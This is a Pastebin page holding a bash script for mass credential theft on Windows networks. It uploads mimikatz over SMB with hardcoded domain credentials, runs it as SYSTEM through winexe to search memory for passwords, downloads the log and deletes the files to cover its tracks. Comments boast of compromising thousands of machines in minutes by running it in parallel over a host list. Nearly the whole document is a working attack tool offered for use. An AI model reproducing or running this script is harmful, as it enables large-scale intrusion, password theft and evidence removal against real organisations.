Advertisement
opexxx

wily-ghetto-psmimi.sh

Jun 12th, 2017
269
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.79 KB | None | 0 0
  1. #!/bin/bash
  2. # wily-ghetto-psmimi.sh - mass password extraction for total windows ownage
  3. # cat smb-hosts.txt | xargs -n1 -P16 sh wilyghetto-psmimi.sh
  4. # actually works well, pwn thousands of boxes in a few minutes
  5.  
  6. host=$1
  7.  
  8. # upload mimikatz
  9. proxychains smbclient -U 'DOMAIN\User%Password123' //${host}/C$ <<WILY
  10. cd Windows\System32
  11. put mimidrv.sys
  12. put mimikatz.exe
  13. put mimilib.dll
  14. exit
  15. WILY
  16.  
  17. # execute mimikatz
  18. proxychains winexe --system -U 'DOMAIN\User%Password123' //${host} '\Windows\System32\mimikatz.exe "log mimi.log" "sekurlsa::searchPasswords" exit'
  19.  
  20. # remove mimikatz
  21. proxychains smbclient -U 'DOMAIN\User%Password123' //${host}/C$ <<WILY
  22. cd Windows\System32
  23. get mimi.log ${host}-mimi-search.log
  24. del mimi.log
  25. del mimidrv.sys
  26. del mimikatz.exe
  27. del mimilib.dll
  28. exit
  29. WILY
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement